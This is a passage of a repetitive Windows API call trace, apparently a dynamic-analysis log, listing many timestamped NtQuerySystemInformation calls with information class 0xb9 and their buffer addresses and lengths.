NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0213.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd440, Length=0x20, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3c0, Length=0x20, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x20, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0213.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd480, Length=0x28, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x28, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0213.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x28, ResultLength=0x0) [0213.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd360, Length=0x20, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd450, Length=0x20, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x38, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x20, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c8, Length=0x50, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x28, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0213.867] NtQuerySystemInformation (SystemInformationClass=0xb9, 